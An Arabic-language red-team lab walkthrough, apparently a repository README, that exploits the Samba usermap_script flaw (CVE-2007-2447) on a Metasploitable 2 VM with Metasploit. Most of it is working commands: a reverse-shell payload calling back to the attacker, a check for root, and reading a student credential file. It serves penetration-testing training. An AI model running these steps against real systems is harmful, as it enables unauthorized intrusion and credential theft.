
مختبر اختبار اختراق خطوة بخطوة يستغل ثغرة Samba CVE-2007-2447 على Metasploitable 2 باستخدام Metasploit، يوضح اختراق الجذر، سرقة بيانات الاعتماد، وتسريب البيانات لتدريب الفريق الأحمر التعليمي.
RedTeam-SMB-PenTest |
|
msfconsole
تأكد من تشغيل جهاز المهاجم والجهاز الضحية.

search samba
use exploit/multi/samba/usermap_script
set RHOST <target_ip>
set LHOST <attacker_ip>
set payload cmd/unix/reverse
exploit
whoami
hostname
cd /redteam7/student3
cat mypass.txt
# الخروج من الشل الحالي
Ctrl C
exit
# قتل جميع المهام الخلفية
sessions -K
jobs -K
# إعادة تشغيل Metasploit
msfconsole
usermap_script شديدة الضعف.| المكون | التفاصيل |
|---|
| جهاز المهاجم | Kali Linux |
| الجهاز الضحية | Metasploitable 2 |
| المنفذ المستهدف | 445 (Samba/SMB) |
| الأداة المستخدمة | exploit/multi/samba/usermap_script |
| هدف بيانات الاعتماد | /redteam7/student3/mypass.txt |